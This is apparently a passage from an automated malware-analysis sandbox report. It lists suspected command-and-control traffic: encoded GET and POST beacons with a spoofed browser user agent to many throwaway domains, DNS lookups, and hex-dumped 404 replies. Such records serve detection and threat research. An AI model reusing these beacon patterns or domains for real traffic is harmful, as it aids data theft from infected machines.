          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /dbbh/?vxPD=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.huyven.xyz
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /fbcx/?vxPD=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.dverkom.store
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.bayarcepat19.click
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /jo6v/?vxPD=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.wdeb18.top
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.galaxyslot88rtp.lat
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /zlyl/?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.dto20.shop
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /ni9w/?vxPD=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.h5hph710am.site
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
        Source: global trafficDNS traffic detected: DNS query: www.drivedoge.website
        Source: global trafficDNS traffic detected: DNS query: www.fieldelse.net
        Source: global trafficDNS traffic detected: DNS query: www.patioprojex.africa
        Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
        Source: global trafficDNS traffic detected: DNS query: www.huyven.xyz
        Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
        Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
        Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
        Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
        Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
        Source: global trafficDNS traffic detected: DNS query: www.dto20.shop
        Source: global trafficDNS traffic detected: DNS query: www.h5hph710am.site
        Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
        Source: unknownHTTP traffic detected: POST /czka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 205Host: www.drivedoge.websiteOrigin: http://www.drivedoge.websiteReferer: http://www.drivedoge.website/czka/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)Data Raw: 76 78 50 44 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d Data Ascii: vxPD=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 30 Oct 2024 04:19:38 GMTX-Varnish: 1439864526Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:26 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:28 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:31 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:33 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
